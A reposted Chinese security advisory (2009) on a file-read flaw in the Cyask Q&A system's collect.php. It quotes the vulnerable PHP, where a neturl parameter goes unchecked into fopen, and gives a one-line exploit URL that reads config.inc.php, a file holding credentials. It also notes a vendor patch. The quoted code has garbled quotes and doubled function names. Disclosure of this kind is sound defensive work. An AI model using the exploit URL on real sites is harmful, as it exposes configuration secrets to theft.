cyask知道系统collect.php页面存在越权漏洞
cyask知道系统collect.php页面存在越权漏洞黑客 发布日期:2009-5-9 1:11:56 共有 129 人次浏览
cyask知道系统collect.php页面存在越权漏洞
添加时间:
2009-05-08
系统编号:
WAVDB-01406
影响版本:
Cyask
程序介绍:
Cyask国内较为多人使用的仿百度风格的Ask系统。
漏洞分析:
从Collect.php代码当中可以看到
else
{
/*
检查网址
*/
$url=get_referer();
$neturl=emptyempty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);
$collect_url=emptyempty($neturl) ? $url : $neturl;
$contents = ”;
if($fid=@fopen($collect_url,”r“))
{
do
{
$data = fread($fid, 4096);
if (strlen($data) == 0)
{
break;
}
$contents .= $data;
}
while(true);
fclose($fid);
}
else
{
show_message(’collect_url_error’, ”);
exit;
}
漏洞利用:
[url]http://www.target.com/collect.php?neturl=config.inc.php[/url]
解决方案:
厂商补丁:
cyask
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
[url]http://www.cyask.com[/url]
页:
[1]